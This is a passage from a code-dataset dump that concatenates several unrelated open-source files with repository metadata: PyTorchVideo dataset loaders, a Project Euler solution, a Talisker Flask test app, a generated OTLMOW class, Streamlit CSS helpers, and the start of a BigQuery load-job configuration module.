                        + [PackPathway(cfg)]
                    ),
                ),
                Lambda(
                    functools.partial(
                        process_charades_label,
                        mode=mode,
                        num_classes=cfg.MODEL.NUM_CLASSES,
                    )
                ),
                DictToTuple(num_clips, num_crops),
            ]
        )
        clip_sampler = make_clip_sampler("random", clip_duration)
        if cfg.NUM_GPUS > 1:
            video_sampler = DistributedSampler
        else:
            video_sampler = (
                RandomSampler if mode == "train" else SequentialSampler
            )
    else:
        # Test mode: fixed ensemble of clips x uniform spatial crops.
        num_clips = cfg.TEST.NUM_ENSEMBLE_VIEWS
        num_crops = cfg.TEST.NUM_SPATIAL_CROPS
        transform = Compose(
            [
                ApplyTransformToKey(
                    key="video",
                    transform=Compose(
                        [
                            Lambda(div255),
                            NormalizeVideo(cfg.DATA.MEAN, cfg.DATA.STD),
                            ShortSideScale(size=cfg.DATA.TEST_CROP_SIZE),
                        ]
                    ),
                ),
                UniformCropVideo(size=cfg.DATA.TEST_CROP_SIZE),
                Lambda(
                    functools.partial(
                        process_charades_label,
                        mode=mode,
                        num_classes=cfg.MODEL.NUM_CLASSES,
                    )
                ),
                ApplyTransformToKey(
                    key="video",
                    transform=Compose(
                        [Lambda(rgb2bgr), PackPathway(cfg)],
                    ),
                ),
                DictToTuple(num_clips, num_crops),
            ]
        )
        clip_sampler = make_clip_sampler(
            "constant_clips_per_video",
            clip_duration,
            num_clips,
            num_crops,
        )
        video_sampler = (
            DistributedSampler if cfg.NUM_GPUS > 1 else SequentialSampler
        )

    data_path = os.path.join(cfg.DATA.PATH_TO_DATA_DIR, "{}.csv".format(mode))
    dataset = Charades(
        data_path=data_path,
        clip_sampler=clip_sampler,
        video_sampler=video_sampler,
        transform=transform,
        video_path_prefix=cfg.DATA.PATH_PREFIX,
        frames_per_clip=cfg.DATA.NUM_FRAMES,
    )
    logger.info(
        "Constructing charades dataloader (size: {}) from {}".format(
            len(dataset._path_to_videos), data_path
        )
    )
    return PTVDatasetWrapper(
        num_videos=len(dataset._path_to_videos),
        clips_per_video=num_clips,
        crops_per_clip=num_crops,
        dataset=dataset,
    )
@DATASET_REGISTRY.register()
def Ptvssv2(cfg, mode):
    """
    Construct PyTorchVideo Something-Something v2 SSv2 video loader.
    Load SSv2 data (frame paths, labels, etc. ) to SSv2 Dataset object.
    The dataset could be downloaded from the official website
    (https://20bn.com/datasets/something-something).
    Please see datasets/DATASET.md for more information about the data format.
    For training and validation, a single clip is randomly sampled from every
    video with random cropping and scaling. For testing, multiple clips are
    uniformaly sampled from every video with uniform cropping. For uniform cropping,
    we take the left, center, and right crop if the width is larger than height,
    or take top, center, and bottom crop if the height is larger than the width.
    Args:
        cfg (CfgNode): configs.
        mode (string): Options includes `train`, `val`, or `test` mode.
    """
    # Only support train, val, and test mode.
    assert mode in [
        "train",
        "val",
        "test",
    ], "Split '{}' not supported".format(mode)
    # Fixed copy-paste bug: this previously logged "Constructing Ptvcharades".
    logger.info("Constructing Ptvssv2 {}...".format(mode))

    if mode in ["train", "val"]:
        # One clip per video with train-time augmentation; frames converted
        # to BGR before pathway packing.
        num_clips = 1
        num_crops = 1
        transform = Compose(
            [
                ApplyTransformToKey(
                    key="video",
                    transform=Compose(
                        [
                            Lambda(div255),
                            NormalizeVideo(cfg.DATA.MEAN, cfg.DATA.STD),
                            RandomShortSideScale(
                                min_size=cfg.DATA.TRAIN_JITTER_SCALES[0],
                                max_size=cfg.DATA.TRAIN_JITTER_SCALES[1],
                            ),
                            RandomCropVideo(cfg.DATA.TRAIN_CROP_SIZE),
                            Lambda(rgb2bgr),
                        ]
                        + (
                            [RandomHorizontalFlipVideo(p=0.5)]
                            if cfg.DATA.RANDOM_FLIP
                            else []
                        )
                        + [PackPathway(cfg)]
                    ),
                ),
                DictToTuple(num_clips, num_crops),
            ]
        )
        clip_sampler = make_clip_sampler(
            "constant_clips_per_video",
            1,  # Put arbitrary duration as ssv2 always needs full video clip.
            num_clips,
            num_crops,
        )
        if cfg.NUM_GPUS > 1:
            video_sampler = DistributedSampler
        else:
            video_sampler = (
                RandomSampler if mode == "train" else SequentialSampler
            )
    else:
        # Test mode: SSv2 only supports a single temporal view.
        assert cfg.TEST.NUM_ENSEMBLE_VIEWS == 1
        num_clips = cfg.TEST.NUM_ENSEMBLE_VIEWS
        num_crops = cfg.TEST.NUM_SPATIAL_CROPS
        transform = Compose(
            [
                ApplyTransformToKey(
                    key="video",
                    transform=Compose(
                        [
                            Lambda(div255),
                            NormalizeVideo(cfg.DATA.MEAN, cfg.DATA.STD),
                            ShortSideScale(size=cfg.DATA.TEST_CROP_SIZE),
                        ]
                    ),
                ),
                UniformCropVideo(size=cfg.DATA.TEST_CROP_SIZE),
                ApplyTransformToKey(
                    key="video",
                    transform=Compose(
                        [Lambda(rgb2bgr), PackPathway(cfg)],
                    ),
                ),
                DictToTuple(num_clips, num_crops),
            ]
        )
        clip_sampler = make_clip_sampler(
            "constant_clips_per_video",
            1,  # Put arbitrary duration as ssv2 always needs full video clip.
            num_clips,
            num_crops,
        )
        video_sampler = (
            DistributedSampler if cfg.NUM_GPUS > 1 else SequentialSampler
        )

    label_name_file = os.path.join(
        cfg.DATA.PATH_TO_DATA_DIR, "something-something-v2-labels.json"
    )
    video_label_file = os.path.join(
        cfg.DATA.PATH_TO_DATA_DIR,
        "something-something-v2-{}.json".format(
            "train" if mode == "train" else "validation"
        ),
    )
    data_path = os.path.join(
        cfg.DATA.PATH_TO_DATA_DIR,
        "{}.csv".format("train" if mode == "train" else "val"),
    )
    dataset = SSv2(
        label_name_file=label_name_file,
        video_label_file=video_label_file,
        video_path_label_file=data_path,
        clip_sampler=clip_sampler,
        video_sampler=video_sampler,
        transform=transform,
        video_path_prefix=cfg.DATA.PATH_PREFIX,
        frames_per_clip=cfg.DATA.NUM_FRAMES,
        rand_sample_frames=mode == "train",
    )
    logger.info(
        "Constructing ssv2 dataloader (size: {}) from {}".format(
            len(dataset._path_to_videos), data_path
        )
    )
    return PTVDatasetWrapper(
        num_videos=len(dataset._path_to_videos),
        clips_per_video=num_clips,
        crops_per_clip=num_crops,
        dataset=dataset,
    )
@DATASET_REGISTRY.register()
def Ptvfishbase(cfg, mode):
    """
    Construct the Fishbase video loader from a directory tree: the root is
    split into modes ('train', 'val', 'test') and inside each mode are
    subdirectories named per label class.
    For `train` and `val` mode, a single clip is randomly sampled from every video
    with random cropping, scaling, and flipping. For `test` mode, multiple clips are
    uniformaly sampled from every video with center cropping.
    Args:
        cfg (CfgNode): configs.
        mode (string): Options includes `train`, `val`, or `test` mode.
            For the train and val mode, the data loader will take data
            from the train or val set, and sample one clip per video.
            For the test mode, the data loader will take data from test set,
            and sample multiple clips per video.
    """
    # Only support train, val, and test mode.
    assert mode in [
        "train",
        "val",
        "test",
    ], "Split '{}' not supported".format(mode)
    logger.info("Constructing Ptvfishbase {}...".format(mode))

    clip_duration = (
        cfg.DATA.NUM_FRAMES * cfg.DATA.SAMPLING_RATE / cfg.DATA.TARGET_FPS
    )
    path_to_dir = os.path.join(
        cfg.DATA.PATH_TO_DATA_DIR, mode
    )
    labeled_video_paths = LabeledVideoPaths.from_directory(path_to_dir)
    num_videos = len(labeled_video_paths)
    labeled_video_paths.path_prefix = cfg.DATA.PATH_PREFIX
    # Fixed copy-paste bug: this previously said "kinetics dataloader".
    logger.info(
        "Constructing fishbase dataloader (size: {}) from {}".format(
            num_videos, path_to_dir
        )
    )

    if mode in ["train", "val"]:
        num_clips = 1
        num_crops = 1
        transform = Compose(
            [
                ApplyTransformToKey(
                    key="video",
                    transform=Compose(
                        [
                            UniformTemporalSubsample(cfg.DATA.NUM_FRAMES),
                            Lambda(div255),
                            # NOTE(review): normalization is deliberately
                            # disabled here (unlike the other loaders) --
                            # confirm this is intended for fish clips.
                            #NormalizeVideo(cfg.DATA.MEAN, cfg.DATA.STD),
                            ShortSideScale(cfg.DATA.TRAIN_JITTER_SCALES[0]),
                        ]
                        + (
                            [Lambda(rgb2gray)]
                            if cfg.DATA.INPUT_CHANNEL_NUM[0] == 1
                            else []
                        )
                        + (
                            [RandomHorizontalFlipVideo(p=0.5)]
                            if cfg.DATA.RANDOM_FLIP
                            else []
                        )
                        + [PackPathway(cfg)]
                    ),
                ),
                DictToTuple(num_clips, num_crops),
            ]
        )
        clip_sampler = make_clip_sampler("random", clip_duration)
        if cfg.NUM_GPUS > 1:
            video_sampler = DistributedSampler
        else:
            video_sampler = (
                RandomSampler if mode == "train" else SequentialSampler
            )
    else:
        num_clips = cfg.TEST.NUM_ENSEMBLE_VIEWS
        num_crops = cfg.TEST.NUM_SPATIAL_CROPS
        transform = Compose(
            [
                ApplyTransformToKey(
                    key="video",
                    transform=Compose(
                        [
                            UniformTemporalSubsample(cfg.DATA.NUM_FRAMES),
                            Lambda(div255),
                            NormalizeVideo(cfg.DATA.MEAN, cfg.DATA.STD),
                            ShortSideScale(
                                size=cfg.DATA.TRAIN_JITTER_SCALES[0]
                            ),
                        ]
                    ),
                ),
                ApplyTransformToKey(key="video", transform=PackPathway(cfg)),
                DictToTuple(num_clips, num_crops),
            ]
        )
        clip_sampler = make_clip_sampler(
            "constant_clips_per_video",
            clip_duration,
            num_clips,
            num_crops,
        )
        video_sampler = (
            DistributedSampler if cfg.NUM_GPUS > 1 else SequentialSampler
        )

    return PTVDatasetWrapper(
        num_videos=num_videos,
        clips_per_video=num_clips,
        crops_per_clip=num_crops,
        dataset=LabeledVideoDataset(
            labeled_video_paths=labeled_video_paths,
            clip_sampler=clip_sampler,
            video_sampler=video_sampler,
            transform=transform,
            decode_audio=False,
        ),
    )
| 32.89932 | 117 | 0.538274 |
e4b894bf1b40aca3b88e3b9db3fe6390c3009216 | 330 | py | Python | ProjectEuler/problem_5.py | aaditkamat/competitive-programming | d0b8f30d3cb3411d2467b98363c12d75d852e245 | [
"MIT"
] | null | null | null | ProjectEuler/problem_5.py | aaditkamat/competitive-programming | d0b8f30d3cb3411d2467b98363c12d75d852e245 | [
"MIT"
] | 3 | 2019-02-24T11:42:28.000Z | 2019-06-03T14:15:46.000Z | ProjectEuler/problem_5.py | aaditkamat/online-judge-submissions | d0b8f30d3cb3411d2467b98363c12d75d852e245 | [
"MIT"
def gcd(x, y):
    """Return the greatest common divisor of x and y.

    Uses Euclid's algorithm (O(log min(x, y))). The original collected every
    common divisor up to min(x, y) by trial division -- O(min(x, y)) work --
    and crashed with an IndexError (``arr[-1]`` on an empty list) whenever
    min(x, y) == 0; gcd(n, 0) now correctly returns n.
    """
    while y:
        x, y = y, x % y
    return x
def lcm(x, y):
    """Return the least common multiple of x and y, via lcm = x*y / gcd."""
    product = x * y
    return product // gcd(x, y)
def solution(num):
    """Return the smallest positive number evenly divisible by all of
    1..num (Project Euler problem 5).

    The original looped over ``range(3, num)``, silently excluding ``num``
    itself; that happened to give the right answer for num=20 (20 already
    divides lcm(1..19)) but is wrong in general (e.g. num=25). The loop now
    runs through ``num`` inclusive, accumulating the LCM directly.
    """
    import math  # local import: this script has no import section

    result = 1
    for i in range(2, num + 1):
        # lcm(result, i) computed in place, without the sibling helpers.
        result = result * i // math.gcd(result, i)
    return result
# Project Euler #5: smallest number evenly divisible by every integer 1..20.
print(solution(20))
83d45b714290133d8387d707a3aae43625fa7c53 | 2,484 | py | Python | tests/flask_app.py | renovate-tests/talisker | ba313b6e52677852560e89365c58efe7b091c6ca | [
"Apache-2.0"
] | null | null | null | tests/flask_app.py | renovate-tests/talisker | ba313b6e52677852560e89365c58efe7b091c6ca | [
"Apache-2.0"
] | null | null | null | tests/flask_app.py | renovate-tests/talisker | ba313b6e52677852560e89365c58efe7b091c6ca | [
"Apache-2.0"
] | null | null | null | #
# Copyright (c) 2015-2018 Canonical, Ltd.
#
# This file is part of Talisker
# (see http://github.com/canonical-ols/talisker).
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import logging
from flask import Flask
import sqlalchemy
from sqlalchemy import Table, Column, Integer, String, MetaData, select
from werkzeug.wrappers import Response
import talisker.flask
from talisker.postgresql import TaliskerConnection
logger = logging.getLogger(__name__)
# NOTE(review): hard-coded localhost credentials -- this looks like a test
# fixture for talisker's integration tests; confirm it is never deployed.
engine = sqlalchemy.create_engine(
    'postgresql://django_app:django_app@localhost:5432/django_app',
    connect_args={'connection_factory': TaliskerConnection},
)

metadata = MetaData()
users = Table(
    'users',
    metadata,
    Column('id', Integer, primary_key=True),
    Column('name', String),
    Column('fullname', String),
)
# Module-import side effects: create the table and insert one seed row.
metadata.create_all(engine)
conn = engine.connect()
conn.execute(users.insert().values(name='jack', fullname='Jack Jones'))

app = Flask(__name__)
talisker.flask.register(app)
# (Dropped a duplicate `logger = logging.getLogger(__name__)` -- the same
# logger is already created right after the imports above.)
@app.route('/')
def index():
    """Trivial health-check endpoint."""
    return 'ok'
@app.route('/logging', endpoint='logging')
def logging_view():
    """Emit sample log records and an outbound POST, then return 'ok'.

    Renamed from ``logging`` -- the old function name shadowed the stdlib
    ``logging`` module imported at the top of this file. The explicit
    ``endpoint='logging'`` keeps the Flask endpoint name (and therefore
    ``url_for('logging')``) unchanged for existing callers.
    """
    logger.info('info', extra={'foo': 'bar'})
    app.logger.info('app logger')
    talisker.requests.get_session().post(
        'http://httpbin.org/post', json={'foo': 'bar'})
    return 'ok'
@app.route('/error/')
def error():
    """Deliberately raise an exception after some traced work.

    Exercises talisker's error reporting: a SQL query, an outbound HTTP POST
    and a log record all happen first so their breadcrumbs appear alongside
    the captured traceback.
    """
    conn.execute(select([users]))
    talisker.requests.get_session().post(
        'http://httpbin.org/post', json={'foo': 'bar'})
    logger.info('halp', extra={'foo': 'bar'})
    raise Exception('test')
@app.route('/nested')
def nested():
    """Proxy a request to a backend address and relay its response.

    NOTE(review): 10.0.4.1:1234 looks like a deliberately unreachable address
    used to exercise talisker's nested-request error handling -- confirm.
    """
    logger.info('here')
    resp = talisker.requests.get_session().get('http://10.0.4.1:1234')
    return Response(resp.content, status=200, headers=resp.headers.items())
| 28.551724 | 75 | 0.716989 |
46459adaa9e429a94a3c24cbb9447a9f7195065d | 3,003 | py | Python | src/OTLMOW/OTLModel/Classes/PoEInjector.py | davidvlaminck/OTLClassPython | 71330afeb37c3ea6d9981f521ff8f4a3f8b946fc | [
"MIT"
] | 2 | 2022-02-01T08:58:11.000Z | 2022-02-08T13:35:17.000Z | src/OTLMOW/OTLModel/Classes/PoEInjector.py | davidvlaminck/OTLMOW | 71330afeb37c3ea6d9981f521ff8f4a3f8b946fc | [
"MIT"
] | null | null | null | src/OTLMOW/OTLModel/Classes/PoEInjector.py | davidvlaminck/OTLMOW | 71330afeb37c3ea6d9981f521ff8f4a3f8b946fc | [
"MIT"
] | null | null | null | # coding=utf-8
from OTLMOW.OTLModel.BaseClasses.OTLAttribuut import OTLAttribuut
from OTLMOW.OTLModel.Classes.AIMNaamObject import AIMNaamObject
from OTLMOW.OTLModel.Datatypes.DtcDocument import DtcDocument
from OTLMOW.OTLModel.Datatypes.KlPoEInjectorMerk import KlPoEInjectorMerk
from OTLMOW.OTLModel.Datatypes.KlPoEInjectorModelnaam import KlPoEInjectorModelnaam
from OTLMOW.GeometrieArtefact.PuntGeometrie import PuntGeometrie
# Generated with OTLClassCreator. To modify: extend, do not edit
class PoEInjector(AIMNaamObject, PuntGeometrie):
"""Een toestel waarmee stroom/voeding voor een ander toestel over een datakabel kan gestuurd worden."""
typeURI = 'https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#PoEInjector'
"""De URI van het object volgens https://www.w3.org/2001/XMLSchema#anyURI."""
def __init__(self):
AIMNaamObject.__init__(self)
PuntGeometrie.__init__(self)
self._merk = OTLAttribuut(field=KlPoEInjectorMerk,
naam='merk',
label='merk',
objectUri='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#PoEInjector.merk',
definition='Het merk van de PoE-injector.',
owner=self)
self._modelnaam = OTLAttribuut(field=KlPoEInjectorModelnaam,
naam='modelnaam',
label='modelnaam',
objectUri='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#PoEInjector.modelnaam',
definition='De modelnaam van de PoE-injector.',
owner=self)
self._technischeFiche = OTLAttribuut(field=DtcDocument,
naam='technischeFiche',
label='technische fiche',
objectUri='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#PoEInjector.technischeFiche',
definition='De technische fiche van de PoE-injector.',
owner=self)
@property
def merk(self):
"""Het merk van de PoE-injector."""
return self._merk.get_waarde()
@merk.setter
def merk(self, value):
self._merk.set_waarde(value, owner=self)
@property
def modelnaam(self):
"""De modelnaam van de PoE-injector."""
return self._modelnaam.get_waarde()
@modelnaam.setter
def modelnaam(self, value):
self._modelnaam.set_waarde(value, owner=self)
@property
def technischeFiche(self):
"""De technische fiche van de PoE-injector."""
return self._technischeFiche.get_waarde()
@technischeFiche.setter
def technischeFiche(self, value):
self._technischeFiche.set_waarde(value, owner=self)
| 44.161765 | 140 | 0.602398 |
820fce50da6dd16183668d25b5ac23caaf5ea9b3 | 8,012 | py | Python | customize.py | Denaro1234/Covid-dashboard | 46d94e87b5fb68eb41290d2cd4f2a24c3e8ef381 | [
"CC-BY-4.0"
] | null | null | null | customize.py | Denaro1234/Covid-dashboard | 46d94e87b5fb68eb41290d2cd4f2a24c3e8ef381 | [
"CC-BY-4.0"
] | null | null | null | customize.py | Denaro1234/Covid-dashboard | 46d94e87b5fb68eb41290d2cd4f2a24c3e8ef381 | [
"CC-BY-4.0"
] | null | null | null | import streamlit as st
import os
PATH = os.path.abspath('')
def page_config():
'''This function is built-in streamlit function for page configuration'''
st.set_page_config(
page_title="Covid-19 Dashboard",
page_icon=PATH + os.sep + 'data/icon.png'
)
def container_map():
'''This function customizes container css if it is in the map view'''
st.markdown(
"""
<style>
.css-1v3fvcr {
position: static;
flex-direction: row;
overflow: visible;
}
.reportview-container .main .block-container{
max-width: 100%;
padding-top: 0rem;
padding-left: 0rem;
padding-right: 0rem;
padding-bottom: 0rem;
}
.css-12oz5g7 {
margin-top: -112px;
margin-bottom: -64px;
}
.js-plotly-plot .plotly .modebar{
position: fixed;
right: 70px;
top: 15px;
}
.js-plotly-plot .plotly .mapboxgl-ctrl-bottom-right{
position: fixed;
}
.js-plotly-plot .plotly .modebar--hover > :not(.watermark){
padding-bottom: 8px;
}
</style>
""",
unsafe_allow_html=True,
)
def container_map_continent():
'''This function customizes container css in the map view and if a continent is selected'''
st.markdown(
"""
<style>
.css-1v3fvcr {
position: static;
flex-direction: row;
overflow: visible;
}
.reportview-container .main .block-container{
max-width: 100%;
padding-top: 0rem;
padding-left: 0rem;
padding-right: 0rem;
padding-bottom: 0rem;
}
.css-12oz5g7 {
margin-top: -64px;
margin-bottom: -64px;
}
.js-plotly-plot .plotly .modebar{
position: fixed;
right: 70px;
top: 15px;
}
.js-plotly-plot .plotly .mapboxgl-ctrl-bottom-right{
position: fixed
}
.js-plotly-plot .plotly .modebar--hover > :not(.watermark){
padding-bottom: 8px;
}
</style>
""",
unsafe_allow_html=True,
)
def container_chart():
'''This function customizes container css in chart view'''
st.markdown(
"""
<style>
.css-1v3fvcr {
position: relative;
flex-direction: column;
overflow: auto;
}
.reportview-container .main .block-container{
max-width: 100%;
padding-top: 1rem;
padding-left: 0rem;
padding-right: 0rem;
padding-bottom: 0rem;
}
.css-12oz5g7 {
margin-top: -64px;
margin-bottom: -64px;
}
.js-plotly-plot .plotly .modebar{
position: absolute;
right: 32px;
top: 80px;
}
</style>
""",
unsafe_allow_html=True,
)
def sidebar():
'''This function customizes sidebar css'''
st.markdown(
"""
<style>
[data-testid="stSidebar"][aria-expanded="true"] > div:first-child {
padding-top: 0rem;
}
[data-testid="stSidebar"][aria-expanded="false"] > div:first-child {
padding-top: 0rem;
}
</style>
""",
unsafe_allow_html=True,
)
# if you wanna change sidebar width, just add: width: 450px
def footer():
'''This function customizes footer css'''
st.markdown("""
<style>
footer {
visibility: hidden;
}
.css-12gp8ed {
max-width: 0rem;
padding: 0rem;
}
</style>
""",
unsafe_allow_html=True,
)
def back_to_map_button():
'''This function customizes back_to_map button css'''
st.markdown("""
<style>
.css-ns78wr {
margin-top: 18px;
margin-left: 64px;
border-color: rgb(255, 75, 75);
background-color: rgb(255, 75, 75);
color: white;
}
.css-ns78wr:hover {
background-color: white;
color: rgb(255, 75, 75);
}
</style>
""",
unsafe_allow_html=True,
)
def dropdown():
'''This function customizes dropdown menu css'''
st.markdown(
"""
<style>
.css-1d0tddh {
text-overflow: clip;
overflow: revert;
white-space: nowrap;
}
</style>
""",
unsafe_allow_html=True,
)
def expander_html_1():
st.write("""
<p style='text-align: justify;'><b>Welcome to my Dashboard!</b></p>
<p style='text-align: justify;'>Select from 23 daily updated COVID-19 related data categories to visualize trends of the pandemic in different countries or continents and the world.</p>
<p style='text-align: justify;'><b>1. Compare countries on the map.</b> Select a data category, a date and a continent for setting the zoom. Finally, hit Submit. (Hint: select "World" in the continent selector for world view.)</p>
<p style='text-align: justify;'><b>2. Compare countries on line chart.</b> Select one or more data categories and countries. Finally, hit Submit. (Hints: 1. Select the displayed time range on the left corner of the charts or set it with the range selector below. 2. Click on "World" in the legend to display the trace of World data.)</p>
<p style='text-align: justify;'><b>3. Compare countries on bar chart.</b> Select one or more data categories and countries. Finally, hit Submit. (Hint: 1. Set the range of the displayed bars with the range selector below.)</p>
<p style='text-align: justify;'>Hit Submit once again if you modified the selection criteria.</p>
<p style='text-align: justify;'>Hit "Go back to map view" to go back to the main page.</p>
""",
unsafe_allow_html=True,
)
def expander_html_2():
st.write("""
<p><b>1. Sources:</b></p>
<ul style= 'margin-bottom: 16px;'>
<li>COVID-19: <a href="https://github.com/owid/covid-19-data/tree/master/public/data" target="_blank">Our World in Data</a>, License: <a href="https://creativecommons.org/licenses/by/4.0/" target="_blank">“CC BY-ND 4.0”</a></li>
<li>Country Coordinates: <a href="https://www.kaggle.com/nikitagrec/world-capitals-gps" target="_blank">Kaggle</a></li>
<li>Page Icon: <a href="https://en.wikipedia.org/wiki/File:Coronavirus_icon.svg" target="_blank">Lucbyhet</a>,<br>License: <a href="https://creativecommons.org/licenses/by/4.0/" target="_blank">“CC BY-ND 4.0”</a></li>
</ul>
<p><b>2. COVID-19 data categories:</b></p>
<ol style= 'margin-bottom: 16px;'>
<li>New cases</li>
<li>New cases (Last 7-day average)</li>
<li>Total cases</li>
<li>New cases per million</li>
<li>New cases per million (Last 7-day average)</li>
<li>Total cases per million</li>
<li>New deaths</li>
<li>New deaths (Last 7-day average)</li>
<li>Total deaths</li>
<li>New deaths per million</li>
<li>New deaths per million (Last 7-day average)</li>
<li>Total deaths per million</li>
<li>Patients in intensive care</li>
<li>Patients in intensive care per million</li>
<li>Hospitalized patients</li>
<li>Hospitalized patients per million</li>
<li>Stringency index</li>
<li>New tests</li>
<li>Total tests</li>
<li>Reproduction rate</li>
<li>People fully vaccinated</li>
<li>People fully vaccinated (%)</li>
<li>Total boosters (%)</li>
</ol>
<p style='text-align: justify;'>For more information on the data categories, please visit the Github repository (link below)</p>
<p><b>3. Further developments:<b></p>
<ul style= 'margin-bottom: 16px;'>
<li>Adding forecasting function in all data categories (ARIMA)</li>
<li>Automatic interpretation of trends and evaluation of figures</li>
<li>Linking scatter map and charts with mouse click/select event</li>
</ul>
<p><b>4. Created by Attila Orosz: <a href="https://github.com/orosz-attila/Covid-19-Dashboard" target="_blank">Github</a><b></p>
""",
unsafe_allow_html=True,
) | 30.697318 | 341 | 0.593984 |
378a256524d8d02946963e6b0e4fed279f4d7678 | 14,999 | py | Python | records_mover/db/bigquery/load_job_config_options.py | cwegrzyn/records-mover | e3b71d6c09d99d0bcd6a956b9d09d20f8abe98d2 | [
"Apache-2.0"
] | 36 | 2020-03-17T11:56:51.000Z | 2022-01-19T16:03:32.000Z | records_mover/db/bigquery/load_job_config_options.py | cwegrzyn/records-mover | e3b71d6c09d99d0bcd6a956b9d09d20f8abe98d2 | [
"Apache-2.0"
] | 60 | 2020-03-02T23:13:29.000Z | 2021-05-19T15:05:42.000Z | records_mover/db/bigquery/load_job_config_options.py | cwegrzyn/records-mover | e3b71d6c09d99d0bcd6a956b9d09d20f8abe98d2 | [
"Apache-2.0"
] | 4 | 2020-08-11T13:17:37.000Z | 2021-11-05T21:11:52.000Z | from ...utils import quiet_remove
from ...records.delimited import cant_handle_hint
from typing import Set
from ...records.load_plan import RecordsLoadPlan
from ...records.records_format import (
DelimitedRecordsFormat, ParquetRecordsFormat, AvroRecordsFormat
)
from records_mover.records.delimited import ValidatedRecordsHints
from records_mover.mover_types import _assert_never
from google.cloud.bigquery.job import CreateDisposition, WriteDisposition
from google.cloud import bigquery
import logging
logger = logging.getLogger(__name__)
def load_job_config(unhandled_hints: Set[str],
load_plan: RecordsLoadPlan) -> bigquery.LoadJobConfig:
# https://cloud.google.com/bigquery/docs/loading-data-cloud-storage-parquet#type_conversions
# https://googleapis.github.io/google-cloud-python/latest/bigquery/generated/google.cloud.bigquery.job.LoadJobConfig.html
# https://cloud.google.com/bigquery/docs/reference/rest/v2/JobConfiguration#JobConfigurationTableCopy
fail_if_cant_handle_hint = load_plan.processing_instructions.fail_if_cant_handle_hint
config = bigquery.LoadJobConfig()
# clustering_fields: Fields defining clustering for the table
#
# > Currently, BigQuery supports clustering over a partitioned
# > table. Use clustering over a partitioned table when:
# > * Your data is already partitioned on a date or timestamp column.
# > * You commonly use filters or aggregation against
# > particular columns in your queries.
#
# https://cloud.google.com/bigquery/docs/clustered-tables
config.clustering_fields = None
# autodetect: Automatically infer the schema from a sample of the data.
# schema: Schema of the destination table.
# create_disposition: Specifies behavior for creating tables.
#
# Rely on prep.py in records/ to create the table.
config.autodetect = False
config.create_disposition = CreateDisposition.CREATE_NEVER
# destination_encryption_configuration: Custom encryption configuration for
# the destination table.
#
# Custom encryption configuration (e.g., Cloud KMS keys) or
# None if using default encryption.
config.destination_encryption_configuration = None
# destination_table_description: Union[str, None] name given to destination
# table.
config.destination_table_description = None
# destination_table_friendly_name: Union[str, None] name given
# to destination table.
config.destination_table_friendly_name = None
# ignore_unknown_values: Ignore extra values not represented
# in the table schema
config.ignore_unknown_values = load_plan.processing_instructions.fail_if_row_invalid
# max_bad_records: Number of invalid rows to ignore.
if load_plan.processing_instructions.max_failure_rows is not None:
config.max_bad_records = load_plan.processing_instructions.max_failure_rows
config.allow_jagged_rows = True
elif load_plan.processing_instructions.fail_if_row_invalid:
config.max_bad_records = 0
config.allow_jagged_rows = False
else:
config.max_bad_records = 999999
config.allow_jagged_rows = True
# write_disposition: Action that occurs if the destination
# table already exists.
#
# Since prep.py handles whatever policy, the table will be
# already empty if we don't want to append anyway:
config.write_disposition = WriteDisposition.WRITE_APPEND
# time_partitioning: Specifies time-based partitioning for the
# destination table.
# use_avro_logical_types: For loads of Avro data, governs whether Avro
# logical types are converted to their corresponding BigQuery types
# labels: Labels for the job.
#
# This method always returns a dict. To change a job’s labels,
# modify the dict, then call Client.update_job. To delete a
# label, set its value to None before updating.
# schema_update_options: Specifies updates to the destination
# table schema to allow as a side effect of the load job.
#
# Allows the schema of the destination table to be updated as
# a side effect of the query job. Schema update options are
# supported in two cases: when writeDisposition is
# WRITE_APPEND; when writeDisposition is WRITE_TRUNCATE and
# the destination table is a partition of a table, specified
# by partition decorators. For normal tables, WRITE_TRUNCATE
# will always overwrite the schema. One or more of the
# following values are specified: ALLOW_FIELD_ADDITION: allow
# adding a nullable field to the
# schema. ALLOW_FIELD_RELAXATION: allow relaxing a required
# field in the original schema to nullable.
config.schema_update_options = None
fail_if_cant_handle_hint = load_plan.processing_instructions.fail_if_cant_handle_hint
if isinstance(load_plan.records_format, DelimitedRecordsFormat):
hints = load_plan.records_format.validate(fail_if_cant_handle_hint=fail_if_cant_handle_hint)
add_load_job_csv_config(unhandled_hints,
hints,
fail_if_cant_handle_hint,
config)
return config
if isinstance(load_plan.records_format, ParquetRecordsFormat):
config.source_format = 'PARQUET'
return config
if isinstance(load_plan.records_format, AvroRecordsFormat):
config.source_format = 'AVRO'
# https://cloud.google.com/bigquery/docs/loading-data-cloud-storage-avro#logical_types
config.use_avro_logical_types = True
return config
raise NotImplementedError("Not currently able to load "
f"{load_plan.records_format.format_type}")
def add_load_job_csv_config(unhandled_hints: Set[str],
hints: ValidatedRecordsHints,
fail_if_cant_handle_hint: bool,
config: bigquery.LoadJobConfig) -> None:
# source_format: File format of the data.
config.source_format = 'CSV'
# encoding: The character encoding of the data.
# The supported values are UTF-8 or ISO-8859-1.
# "UTF-8 or ISO-8859-1"
#
if hints.encoding == 'UTF8':
config.encoding = 'UTF-8'
else:
# Currently records hints don't support ISO-8859-1
cant_handle_hint(fail_if_cant_handle_hint, 'encoding', hints)
quiet_remove(unhandled_hints, 'encoding')
# field_delimiter: The separator for fields in a CSV file.
assert isinstance(hints.field_delimiter, str)
config.field_delimiter = hints.field_delimiter
quiet_remove(unhandled_hints, 'field-delimiter')
# allow_jagged_rows: Allow missing trailing optional columns (CSV only).
# null_marker: Represents a null value (CSV only)
#
# (documentation is mangled for this one, but I assume the default is
# '' or something sensible, so not messing with it)
# quote_character: Character used to quote data sections (CSV
# only).
#
# [Optional] The value that is used to quote data sections in
# a CSV file. BigQuery converts the string to ISO-8859-1
# encoding, and then uses the first byte of the encoded string
